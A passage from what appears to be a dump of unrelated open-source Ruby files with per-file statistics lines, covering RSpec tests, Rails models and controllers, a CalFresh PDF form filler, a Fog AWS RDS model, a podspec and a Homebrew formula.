let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_fav, 2
end
end
describe '#sign_off!' do
let(:application) { create(:application) }
let(:mentor) { create(:mentor) }
def keys_for(choice)
["signed_off_at_project#{choice}", "signed_off_by_project#{choice}"]
end
subject { m_application.sign_off!(as: mentor) }
shared_examples :a_mentor_sign_off do |choice|
let(:other) { (choice % 2) + 1 }
let(:now) { Time.now.utc.to_s }
before { Timecop.freeze(now) }
after { Timecop.return }
it 'adds the signoff time and user id to the application' do
expect { subject }
.to change { application.reload.application_data.values_at(*keys_for(choice)) }
.from([nil, nil])
.to contain_exactly(now, mentor.id.to_s)
end
it 'does not change the signoff for the other project' do
expect { subject }
.not_to change { application.reload.application_data.values_at(*keys_for(other)) }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_sign_off, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_sign_off, 2
end
end
describe '#revoke_sign_off!' do
let(:application) { create(:application, application_data: data) }
let(:mentor) { create(:mentor) }
let(:data) do
{
signed_off_at_project1: Time.now.utc.to_s,
signed_off_by_project1: mentor.id.to_s,
signed_off_at_project2: Time.now.utc.to_s,
signed_off_by_project2: '99'
}
end
def keys_for(choice)
["signed_off_at_project#{choice}", "signed_off_by_project#{choice}"]
end
subject { m_application.revoke_sign_off! }
shared_examples :a_mentor_sign_off do |choice|
let(:other) { (choice % 2) + 1 }
it 'sets the signoff time and user id to nil' do
expect { subject }
.to change { application.reload.application_data.values_at(*keys_for(choice)) }
.to([nil, nil])
end
it 'does not change the signoff for the other project' do
expect { subject }
.not_to change { application.reload.application_data.values_at(*keys_for(other)) }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_sign_off, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_sign_off, 2
end
end
describe '#signed_off?' do
it 'returns true if signed_off_at was set' do
application = described_class.new(signed_off_at: Time.now.utc.to_s)
expect(application).to be_signed_off
end
it 'returns false if signed_off_at was not set' do
application = described_class.new
expect(subject).not_to be_signed_off
end
end
describe '#mentor_fav?' do
it 'returns true if mentor_fav was set' do
application = described_class.new(mentor_fav: 'true')
expect(application).to be_mentor_fav
end
it 'returns false if mentor_fav was not set' do
application = described_class.new
expect(subject).not_to be_mentor_fav
end
end
describe '#to_param' do
it 'returns the underlying active record id' do
subject.id = 4711
expect(subject.to_param).to eql '4711'
end
end
end
| 36.05303 | 128 | 0.658822 |
7adbd1f526bcc96a09d57b6f185fbb48f0051325 | 585 | # frozen_string_literal: true
require 'ffaker'
FactoryBot.define do
factory :team_passage_template do
team
pool_type_id { ((rand * 10) % 2).to_i + 1 } # ASSERT: 25 and 50 meters type should exists
event_type_id do
EventsByPoolType.only_for_meetings
.for_pool_type_code(pool_type_id == 1 ? '25' : '50')
.min { rand - 0.5 }
.event_type_id
end
passage_type { PassageType.all.min { rand - 0.5 } }
end
#-- -------------------------------------------------------------------------
#++
end
| 29.25 | 93 | 0.509402 |
87d60e7ac586f9cae2d01e8fd4a85293a08ac67a | 405 | # frozen_string_literal: true
# Controller for Over Morgens fabulous Energy Mix infographic
class EnergyMixController < ApplicationController
layout 'energy_mix'
def show
@scenario = Api::Scenario.find(params[:id])
@saved_scenario = SavedScenario.find_by(scenario_id: @scenario.id)
rescue ActiveResource::ResourceNotFound
# No such scenario.
render_not_found('scenario')
end
end
| 27 | 70 | 0.767901 |
6a2461d3c0672efaf13138a48efc008e66d971f6 | 5,987 | module Calfresh
FORM_FIELDS = { name: 'Text1 PG 1', \
name_page3: 'Text3 PG 3', \
home_address: 'Text4 PG 1', \
home_city: 'Text5 PG 1', \
home_state: 'Text6 PG 1', \
home_zip_code: 'Text7 PG 1', \
date: 'Text32 PG 1', \
home_phone_number: 'Text12 PG 1', \
email: 'Text13 PG 1', \
date_of_birth: 'Text5 PG 3', \
sex: 'Text6 PG 3', \
ssn: 'Text3 PG 1', \
ssn_page3: 'Text9 PG 3', \
language_preference_reading: 'Text19 PG 1', \
language_preference_writing: 'Text20 PG 1',
addlhh_1_name: "Text12 PG 3",
addlhh_1_date_of_birth: "Text14 PG 3",
addlhh_1_sex: "Text15 PG 3",
addlhh_1_ssn: "Text18 PG 3",
addlhh_2_name: "Text21 PG 3",
addlhh_2_date_of_birth: "Text23 PG 3",
addlhh_2_sex: "Text24 PG 3",
addlhh_2_ssn: "Text27 PG 3",
addlhh_3_name: "Text30 PG 3",
addlhh_3_date_of_birth: "Text32 PG 3",
addlhh_3_sex: "Text33 PG 3",
addlhh_3_ssn: "Text36 PG 3",
addlhh_4_name: "Text39 PG 3",
addlhh_4_date_of_birth: "Text41 PG 3",
addlhh_4_sex: "Text42 PG 3",
addlhh_4_ssn: "Text45 PG 3",
interview_monday: 'Check Box47 PG 2',
interview_tuesday: 'Check Box48 PG 2',
interview_wednesday: 'Check Box49 PG 2',
interview_thursday: 'Check Box50 PG 2',
interview_friday: 'Check Box51 PG 2',
interview_early_morning: 'Check Box52 PG 2',
interview_mid_morning: 'Check Box53 PG 2',
interview_afternoon: 'Check Box54 PG 2',
interview_late_afternoon: 'Check Box55 PG 2',
signature: 'signature'
}
class ApplicationWriter
def initialize
@pdftk = PdfForms.new('pdftk')
end
def fill_out_form(input)
symbolized_key_input = symbolize_keys(input)
symbolized_key_input_with_addlhhs = process_addl_hh_members(symbolized_key_input)
validated_field_input = filter_input_for_valid_fields(symbolized_key_input_with_addlhhs)
input_for_pdf_writer = map_input_to_pdf_field_names(validated_field_input)
input_for_pdf_writer[FORM_FIELDS[:date]] = Time.zone.today.strftime("%m/%d/%Y")
input_for_pdf_writer['Check Box1 PG 3'] = "Yes"
if symbolized_key_input[:medi_cal_interest] == "on"
input_for_pdf_writer['Check Box24 PG 1'] = "Yes"
end
unique_key = SecureRandom.hex
# Fill in CF-285 to file: filled_in_form_path
# TO DO: Add e-sig to CF-285
filled_in_form_path = "/tmp/application_#{unique_key}.pdf"
empty_form_path = File.expand_path("../calfresh/calfresh_3pager.pdf", __FILE__)
@pdftk.fill_form(empty_form_path, filled_in_form_path, input_for_pdf_writer)
# Add cover page to file: path_for_app_without_info_release_form
path_for_app_without_info_release_form = "/tmp/final_application_without_info_release_#{unique_key}.pdf"
cover_letter_path = File.expand_path("../calfresh/cover_letter_v5.pdf", __FILE__)
system("pdftk #{cover_letter_path} #{filled_in_form_path} cat output #{path_for_app_without_info_release_form}")
# Add ROI form
# TO DO: Add e-sig to ROI form
path_for_info_release_form = "/tmp/info_release_form_#{unique_key}.pdf"
info_release_form = InfoReleaseForm.new(client_information: validated_field_input, path_for_pdf: path_for_info_release_form)
system("pdftk #{path_for_app_without_info_release_form} #{path_for_info_release_form} cat output /tmp/final_application_#{unique_key}.pdf")
Application.new(unique_key)
end
def process_addl_hh_members(input)
if input[:additional_household_members] != nil
new_input = input
input[:additional_household_members].each_with_index do |person_hash, array_index|
index_starting_at_one = array_index + 1
person_hash.each do |key, value|
new_input["addlhh_#{index_starting_at_one}_#{key}".to_sym] = value
end
end
return new_input
else
return input
end
end
#private
def filter_input_for_valid_fields(form_input_hash)
form_input_hash.select do |human_readable_field_name, value|
FORM_FIELDS.has_key?(human_readable_field_name)
end
end
def map_input_to_pdf_field_names(form_input)
new_hash = Hash.new
form_input.each do |human_readable_field_name, value|
new_hash[FORM_FIELDS[human_readable_field_name]] = value
end
new_hash
end
def symbolize_keys(hash)
symbolized_hash = Hash.new
hash.each { |key,value| symbolized_hash[key.to_sym] = value }
symbolized_hash
end
end
class Application
attr_reader :unique_key
def initialize(unique_key)
@unique_key = unique_key
end
def final_pdf_path
"/tmp/final_application_#{unique_key}.pdf"
end
end
class InfoReleaseForm
def initialize(params)
name = params[:client_information][:name]
signature = params[:client_information][:signature]
date_today = Time.zone.today.strftime("%m/%d/%Y")
pdf = Prawn::Document.new
pdf.font 'Helvetica'
pdf.font('Helvetica', style: :bold) do
pdf.text 'Subject: Authorization for release of information'
pdf.text 'To: San Francisco Human Services Agency'
end
pdf.move_down 10
pdf.text(<<EOF
I, #{name}, authorize you to release the following information regarding my CalFresh application or active case to Code for America:
- Case number
- Current and past application status
- Dates and reasons for all changes to the application status
- Current and past benefit allotment
- Reasons my case was pended or denied
- Description of all verification documents that were submitted
Code for America will use this information to make sure my case is processed properly.
Electronic signature: #{signature}
Date: #{date_today}
___________________________________
Code for America
155 9th Street, San Francisco 94103
(415) 625-9633
www.codeforamerica.org
EOF
)
pdf.render_file(params[:path_for_pdf])
end
end
end
| 35.426036 | 145 | 0.704694 |
18898c1f5a84b922b2bfc6ca5b4f5c215c8825a7 | 384 | module Highrise
class Person < Subject
include Pagination
include Taggable
def self.find_all_across_pages_since(time)
find_all_across_pages(:params => { :since => time.to_s(:db).gsub(/[^\d]/, '') })
end
def company
Company.find(company_id) if company_id
end
def name
"#{first_name} #{last_name}".strip
end
end
end | 19.2 | 86 | 0.619792 |
ffb6e13e97d56bca47e963b6777c11ef579712d7 | 34 | include_recipe "jupyter::default"
| 17 | 33 | 0.823529 |
7ab6092b226b05bf1423295c284e0fb8e8682032 | 250 | class CreateTestDbs < ActiveRecord::Migration
def change
create_table :test_dbs do |t|
t.integer :city_code
t.integer :cs
t.integer :count
t.integer :status
t.integer :user_id
t.timestamps
end
end
end
| 17.857143 | 45 | 0.64 |
1d8ce747f5b385edb8b0826c81fcbfff68831052 | 1,733 | # Copyright (c) 2007-2015, Evan Phoenix and contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Rubinius nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Only part of Rubinius' thread.rb
class Thread
def self.stop
sleep
nil
end
def self.exit
Thread.current.kill
end
def self.kill(thread)
thread.kill
end
end
| 38.511111 | 80 | 0.773226 |
abe98d59d3f3939a5139bd77b85e096097ee3dde | 7,864 | module Fog
module AWS
class RDS
class Server < Fog::Model
identity :id, :aliases => 'DBInstanceIdentifier'
attribute :allocated_storage, :aliases => 'AllocatedStorage', :type => :integer
attribute :auto_minor_version_upgrade, :aliases => 'AutoMinorVersionUpgrade'
attribute :availability_zone, :aliases => 'AvailabilityZone'
attribute :backup_retention_period, :aliases => 'BackupRetentionPeriod', :type => :integer
attribute :ca_certificate_id, :aliases => 'CACertificateIdentifier'
attribute :character_set_name, :aliases => 'CharacterSetName'
attribute :cluster_id, :aliases => 'DBClusterIdentifier'
attribute :created_at, :aliases => 'InstanceCreateTime', :type => :time
attribute :db_name, :aliases => 'DBName'
attribute :db_parameter_groups, :aliases => 'DBParameterGroups'
attribute :db_security_groups, :aliases => 'DBSecurityGroups', :type => :array
attribute :db_subnet_group_name, :aliases => 'DBSubnetGroupName'
attribute :dbi_resource_id, :aliases => 'DbiResourceId'
attribute :endpoint, :aliases => 'Endpoint'
attribute :engine, :aliases => 'Engine'
attribute :engine_version, :aliases => 'EngineVersion'
attribute :flavor_id, :aliases => 'DBInstanceClass'
attribute :iops, :aliases => 'Iops', :type => :integer
attribute :kms_key_id, :aliases => 'KmsKeyId'
attribute :last_restorable_time, :aliases => 'LatestRestorableTime', :type => :time
attribute :license_model, :aliases => 'LicenseModel'
attribute :master_username, :aliases => 'MasterUsername'
attribute :multi_az, :aliases => 'MultiAZ', :type => :boolean
attribute :pending_modified_values, :aliases => 'PendingModifiedValues'
attribute :preferred_backup_window, :aliases => 'PreferredBackupWindow'
attribute :preferred_maintenance_window, :aliases => 'PreferredMaintenanceWindow'
attribute :publicly_accessible, :aliases => 'PubliclyAccessible'
attribute :read_replica_identifiers, :aliases => 'ReadReplicaDBInstanceIdentifiers', :type => :array
attribute :read_replica_source, :aliases => 'ReadReplicaSourceDBInstanceIdentifier'
attribute :state, :aliases => 'DBInstanceStatus'
attribute :storage_encrypted, :aliases => 'StorageEncrypted', :type => :boolean
attribute :storage_type, :aliases => 'StorageType'
attribute :tde_credential_arn, :aliases => 'TdeCredentialArn'
attribute :vpc_security_groups, :aliases => 'VpcSecurityGroups', :type => :array
attr_accessor :password, :parameter_group_name, :security_group_names, :port, :source_snapshot_id
def cluster
return nil unless cluster_id
service.clusters.get(cluster_id)
end
def create_read_replica(replica_id, options={})
options[:security_group_names] ||= options['DBSecurityGroups']
params = self.class.new(options).attributes_to_params
service.create_db_instance_read_replica(replica_id, id, params)
service.servers.get(replica_id)
end
def ready?
state == 'available'
end
def destroy(snapshot_identifier=nil)
requires :id
service.delete_db_instance(id, snapshot_identifier, snapshot_identifier.nil?)
true
end
def reboot
service.reboot_db_instance(id)
true
end
def snapshots
requires :id
service.snapshots(:server => self)
end
def tags
requires :id
service.list_tags_for_resource(id).
body['ListTagsForResourceResult']['TagList']
end
def add_tags(new_tags)
requires :id
service.add_tags_to_resource(id, new_tags)
tags
end
def remove_tags(tag_keys)
requires :id
service.remove_tags_from_resource(id, tag_keys)
tags
end
def promote_read_replica
requires :id
data = service.promote_read_replica(id).body["PromoteReadReplicaResult"]["DBInstance"]
merge_attributes(data)
end
alias promote promote_read_replica
def modify(immediately, options)
options[:security_group_names] ||= options['DBSecurityGroups']
params = self.class.new(options).attributes_to_params
data = service.modify_db_instance(id, immediately, params)
merge_attributes(data.body['ModifyDBInstanceResult']['DBInstance'])
true
end
def save
if source_snapshot_id
requires :id
data = service.restore_db_instance_from_db_snapshot(source_snapshot_id, id, attributes_to_params)
merge_attributes(data.body['RestoreDBInstanceFromDBSnapshotResult']['DBInstance'])
else
requires :engine
if engine == 'aurora'
requires :cluster_id
self.flavor_id ||= 'db.r3.large'
else
requires :master_username
requires :password
requires :allocated_storage
self.flavor_id ||= 'db.m1.small'
end
data = service.create_db_instance(id, attributes_to_params)
merge_attributes(data.body['CreateDBInstanceResult']['DBInstance'])
true
end
end
# Converts attributes to a parameter hash suitable for requests
def attributes_to_params
options = {
'AllocatedStorage' => allocated_storage,
'AutoMinorVersionUpgrade' => auto_minor_version_upgrade,
'AvailabilityZone' => availability_zone,
'BackupRetentionPeriod' => backup_retention_period,
'DBClusterIdentifier' => cluster_id,
'DBInstanceClass' => flavor_id,
'DBInstanceIdentifier' => id,
'DBName' => db_name,
'DBParameterGroupName' => parameter_group_name || attributes['DBParameterGroupName'],
'DBSecurityGroups' => security_group_names,
'DBSubnetGroupName' => db_subnet_group_name,
'Engine' => engine,
'EngineVersion' => engine_version,
'Iops' => iops,
'KmsKeyId' => kms_key_id,
'LicenseModel' => license_model,
'MasterUserPassword' => password || attributes['MasterUserPassword'],
'MasterUsername' => master_username,
'MultiAZ' => multi_az,
'Port' => port || attributes['Port'],
'PreferredBackupWindow' => preferred_backup_window,
'PreferredMaintenanceWindow' => preferred_maintenance_window,
'PubliclyAccessible' => publicly_accessible,
'StorageEncrypted' => storage_encrypted,
'StorageType' => storage_type,
'VpcSecurityGroups' => vpc_security_groups,
}
options.delete_if {|key, value| value.nil?}
end
end
end
end
end
| 45.456647 | 112 | 0.570448 |
ffaaf73ba121afa4bf083511f01f1f0696c99c19 | 3,078 | Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.name = "MapboxNavigation-Documentation"
s.version = '1.3.0'
s.summary = "Complete turn-by-turn navigation interface for iOS."
s.description = <<-DESC
The Mapbox Navigation SDK for iOS is a drop-in interface for turn-by-turn navigation along a route, complete with a well-designed map and easy-to-understand spoken directions. Routes are powered by Mapbox Directions.
DESC
s.homepage = "https://docs.mapbox.com/ios/navigation/"
s.documentation_url = "https://docs.mapbox.com/ios/api/navigation/"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.license = { :type => "ISC", :file => "LICENSE.md" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.author = { "Mapbox" => "[email protected]" }
s.social_media_url = "https://twitter.com/mapbox"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.ios.deployment_target = "12.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.source = { :git => "https://github.com/mapbox/mapbox-navigation-ios.git", :tag => "v#{s.version.to_s}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.source_files = "Sources/{MapboxNavigation,MapboxCoreNavigation,CMapboxCoreNavigation/include}/**/*.{h,m,swift}"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.resources = ['Sources/MapboxNavigation/Resources/*/*', 'Sources/MapboxNavigation/Resources/*']
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.requires_arc = true
s.module_name = "MapboxNavigation"
s.frameworks = ['CarPlay']
s.dependency "MapboxAccounts", "~> 2.3.0"
s.dependency "MapboxDirections", "~> 1.2.0"
s.dependency "MapboxGeocoder.swift", "~> 0.10.0"
s.dependency "Mapbox-iOS-SDK", "~> 6.0"
s.dependency "MapboxMobileEvents", "~> 0.10.2"
s.dependency "MapboxNavigationNative", "~> 31.0"
s.dependency "Solar", "~> 2.1"
s.dependency "Turf", "~> 1.0"
s.dependency "MapboxSpeech", "~> 1.0"
s.swift_version = "5.0"
# https://github.com/mapbox/mapbox-navigation-ios/issues/2665
s.user_target_xcconfig = {
'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => '$(EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_$(EFFECTIVE_PLATFORM_SUFFIX)__NATIVE_ARCH_64_BIT_$(NATIVE_ARCH_64_BIT)__XCODE_$(XCODE_VERSION_MAJOR))',
'EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_simulator__NATIVE_ARCH_64_BIT_x86_64__XCODE_1200' => 'arm64 arm64e armv7 armv7s armv6 armv8'
}
s.pod_target_xcconfig = {
'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => '$(EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_$(EFFECTIVE_PLATFORM_SUFFIX)__NATIVE_ARCH_64_BIT_$(NATIVE_ARCH_64_BIT)__XCODE_$(XCODE_VERSION_MAJOR))',
'EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_simulator__NATIVE_ARCH_64_BIT_x86_64__XCODE_1200' => 'arm64 arm64e armv7 armv7s armv6 armv8'
}
end
| 43.971429 | 218 | 0.598765 |
1a2d043177fe0dcf9f2e4f44f11cffc5171c19cb | 863 |
Given /^I have input file\(s\) named "(.*?)"$/ do |arg1|
@filenames = arg1.split(/,/)
end
When /^I execute "(.*?)"$/ do |arg1|
@cmd = arg1 + ' < ' + @filenames[0]
end
Then(/^I expect the named output to match the named output "(.*?)"$/) do |arg1|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(##BioVcf|date|"version":)').should be_truthy
end
Then(/^I expect the named output to match the named output "([^"]*)" in under (\d+) seconds$/) do |arg1, arg2|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(##BioVcf|date|"version":)',timeout: arg2.to_i).should be_truthy
end
Then(/^I expect an error and the named output to match the named output "(.*?)" in under (\d+) seconds$/) do |arg1,arg2|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(FATAL|Waiting|from|vcf|Options|Final pid)',should_fail: true,timeout:arg2.to_i).should be_truthy
end
| 39.227273 | 148 | 0.66628 |
1abe047ee30d1dcc5a865d97be495b52d4842721 | 2,072 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20160212213438) do
create_table "resource_as", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "parent_id"
t.integer "master_id"
t.integer "leader_id"
t.string "explicit_attr"
t.string "implicit_attr"
t.string "custom_attr"
t.string "nested_accessor"
t.string "dynamic_accessor"
t.string "private_accessor"
t.string "aliased_accessor"
t.string "from_accessor"
t.string "to_accessor"
t.string "compound_accessor"
t.string "nested_compound_accessor"
t.string "unexposed_attr"
end
create_table "resource_bs", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "other_id"
t.integer "extra_id"
t.string "explicit_attr"
t.string "implicit_attr"
t.string "custom_attr"
t.string "nested_accessor"
t.string "dynamic_accessor"
t.string "private_accessor"
t.string "aliased_accessor"
t.string "from_accessor"
t.string "to_accessor"
t.string "compound_accessor"
t.string "nested_compound_accessor"
t.string "unexposed_attr"
end
end
| 37 | 86 | 0.688707 |
d5410cdd6a4298bbf9b42788a5fc34a84a434981 | 5,260 | module UnitTests
module Matchers
def match_against(object)
MatchAgainstMatcher.new(object)
end
class MatchAgainstMatcher
DIVIDER = ('-' * Shoulda::Matchers::WordWrap::TERMINAL_WIDTH).freeze
attr_reader :failure_message, :failure_message_when_negated
def initialize(object)
@object = object
@failure_message = nil
@failure_message_when_negated = nil
@should_be_negated = nil
end
def and_fail_with(message, wrap: false)
@expected_message =
if wrap
Shoulda::Matchers.word_wrap(message.strip_heredoc.strip)
else
message.strip_heredoc.strip
end
@should_be_negated = true
self
end
def or_fail_with(message, wrap: false)
@expected_message =
if wrap
Shoulda::Matchers.word_wrap(message.strip_heredoc.strip)
else
message.strip_heredoc.strip
end
@should_be_negated = false
self
end
def matches?(generate_matcher)
@positive_matcher = generate_matcher.call
@negative_matcher = generate_matcher.call
if expected_message && should_be_negated?
raise ArgumentError.new(
'Use `or_fail_with`, not `and_fail_with`, when using '\
'`should match_against(...)`!',
)
end
if positive_matcher.matches?(object)
matcher_fails_in_negative?
else
@failure_message = <<-MESSAGE
Expected the matcher to match in the positive, but it failed with this message:
#{DIVIDER}
#{positive_matcher.failure_message}
#{DIVIDER}
MESSAGE
false
end
end
def does_not_match?(generate_matcher)
@positive_matcher = generate_matcher.call
@negative_matcher = generate_matcher.call
if expected_message && !should_be_negated?
raise ArgumentError.new(
'Use `and_fail_with`, not `or_fail_with`, when using '\
'`should_not match_against(...)`!',
)
end
if matcher_fails_in_positive?
if (
negative_matcher.respond_to?(:does_not_match?) &&
!negative_matcher.does_not_match?(object)
)
@failure_message_when_negated = <<-MESSAGE
Expected the matcher to match in the negative, but it failed with this message:
#{DIVIDER}
#{negative_matcher.failure_message_when_negated}
#{DIVIDER}
MESSAGE
false
else
true
end
end
end
def supports_block_expectations?
true
end
private
attr_reader(
:object,
:expected_message,
:positive_matcher,
:negative_matcher,
)
def should_be_negated?
@should_be_negated
end
def matcher_fails_in_negative?
if does_not_match_in_negative?
if (
!expected_message ||
expected_message == negative_matcher.failure_message_when_negated.strip
)
true
else
diff_result = diff(
expected_message,
negative_matcher.failure_message_when_negated.strip,
)
@failure_message = <<-MESSAGE
Expected the negative version of the matcher not to match and for the failure
message to be:
#{DIVIDER}
#{expected_message.chomp}
#{DIVIDER}
However, it was:
#{DIVIDER}
#{negative_matcher.failure_message_when_negated}
#{DIVIDER}
Diff:
#{Shoulda::Matchers::Util.indent(diff_result, 2)}
MESSAGE
false
end
else
@failure_message =
'Expected the negative version of the matcher not to match, '\
'but it did.'
false
end
end
def does_not_match_in_negative?
if negative_matcher.respond_to?(:does_not_match?)
!negative_matcher.does_not_match?(object)
else
# generate failure_message_when_negated
negative_matcher.matches?(object)
true
end
end
def matcher_fails_in_positive?
if !positive_matcher.matches?(object)
if (
!expected_message ||
expected_message == positive_matcher.failure_message.strip
)
true
else
diff_result = diff(
expected_message,
positive_matcher.failure_message.strip,
)
@failure_message_when_negated = <<-MESSAGE
Expected the positive version of the matcher not to match and for the failure
message to be:
#{DIVIDER}
#{expected_message.chomp}
#{DIVIDER}
However, it was:
#{DIVIDER}
#{positive_matcher.failure_message}
#{DIVIDER}
Diff:
#{Shoulda::Matchers::Util.indent(diff_result, 2)}
MESSAGE
false
end
else
@failure_message_when_negated =
'Expected the positive version of the matcher not to match, '\
'but it did.'
false
end
end
def diff(expected, actual)
differ.diff(expected, actual)[1..]
end
def differ
@_differ ||= RSpec::Support::Differ.new
end
end
end
end
| 24.239631 | 83 | 0.598289 |
33974720f970a7683264598f6041665f7848752e | 177 | class CreateLists < ActiveRecord::Migration[5.2]
def change
create_table :lists do |t|
t.string :name
t.string :category
t.timestamps
end
end
end
| 16.090909 | 48 | 0.644068 |
b9143c49a8c5df935a00a457fc5a9d008fde9470 | 857 | # Copyright 2008-2009 Amazon.com, Inc. or its affiliates. All Rights
# Reserved. Licensed under the Amazon Software License (the
# "License"). You may not use this file except in compliance with the
# License. A copy of the License is located at
# http://aws.amazon.com/asl or in the "license" file accompanying this
# file. This file is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See
# the License for the specific language governing permissions and
# limitations under the License.
module EC2
module Platform
module Base
class Architecture
I386 = 'i386'
X86_64 = 'x86_64'
UNKNOWN = 'unknown'
SUPPORTED = [I386, X86_64]
def self.supported? arch
SUPPORTED.include? arch
end
end
end
end
end
| 31.740741 | 70 | 0.677946 |
b90a28e18256954f63d50fca51032038beb4bbe4 | 1,184 | # No head build supported; if you need head builds of Mercurial, do so outside
# of Homebrew.
class Mercurial < Formula
desc "Scalable distributed version control system"
homepage "https://mercurial.selenic.com/"
url "https://mercurial.selenic.com/release/mercurial-3.4.1.tar.gz"
sha256 "7a8acf7329beda38ceea29c689212574d9a6bfffe24cf565015ea0066f7cee3f"
bottle do
cellar :any
sha256 "f038a255e43c177ae362f319d0cef3e42c1bf631418de78ee13165dc48d2b9ba" => :yosemite
sha256 "b9408e88838e05d57720735b95c8dc00efbf81f655846b29fb363895580a1daa" => :mavericks
sha256 "a0b7d3f952aae73b8b02aff8c82c41af458babddf9c1e01118676ec1139a734b" => :mountain_lion
end
def install
ENV.minimal_optimization if MacOS.version <= :snow_leopard
system "make", "PREFIX=#{prefix}", "install-bin"
# Install man pages, which come pre-built in source releases
man1.install "doc/hg.1"
man5.install "doc/hgignore.5", "doc/hgrc.5"
# install the completion scripts
bash_completion.install "contrib/bash_completion" => "hg-completion.bash"
zsh_completion.install "contrib/zsh_completion" => "_hg"
end
test do
system "#{bin}/hg", "init"
end
end
| 35.878788 | 95 | 0.757601 |
391f5a0545f37a10d4e990a7dd4f7ec743b55942 | 514 | require File.join(File.dirname(__FILE__), "..", "spec_helper.rb")
module Crunchbase
describe NewItem, :vcr do
subject { NewItem.lists_for_permalink("facebook") }
it_has_behavior 'pagination'
it_behaves_like 'a container', 1000
describe 'paging' do
let(:page) { 4 }
subject { NewItem.lists_for_permalink("facebook", {page: page}) }
its(:next_page_url) { should be nil }
its(:per_page) { should eq(1000) }
its(:current_page) { should eq(page) }
end
end
end
| 25.7 | 71 | 0.655642 |
1d3bb2677a5648e71dbc6cc067ddeab30d7c9bef | 552 | ActiveRecord::Schema.define do
create_table :audits, force: true do |t|
t.column :auditable_id, :integer
t.column :auditable_type, :string
t.column :user_id, :integer
t.column :user_type, :string
t.column :username, :string
t.column :action, :string
t.column :audited_changes, :text
t.column :version, :integer, default: 0
t.column :comment, :string
t.column :created_at, :datetime
t.column :remote_address, :string
t.column :association_id, :integer
t.column :association_type, :string
end
end
| 29.052632 | 43 | 0.692029 |
330f43d2c54c8760f63838b596417abe4845c77e | 148 | json.extract! monitored_service_log, :id, :delay, :delivery_ratio, :created_at
json.url monitored_service_url(monitored_service_log, format: :json)
| 49.333333 | 78 | 0.824324 |
6299b96a9b30282e9731ec90b81e2cdefdbd39b6 | 636 | require 'fog/core/collection'
require 'fog/openstack/models/compute/tenant'
module Fog
module Compute
class OpenStack
class Tenants < Fog::Collection
model Fog::Compute::OpenStack::Tenant
def all
load(service.list_tenants.body['tenants'])
end
def usages(start_date = nil, end_date = nil, details = false)
service.list_usages(start_date, end_date, details).body['tenant_usages']
end
def find_by_id(id)
self.find {|tenant| tenant.id == id}
end
end # class Tenants
end # class OpenStack
end # module Compute
end # module Fog
| 25.44 | 82 | 0.638365 |
612bcc95738bd0eb8780d6f62d572be9df8f8394 | 551 | module GrapedMoviez
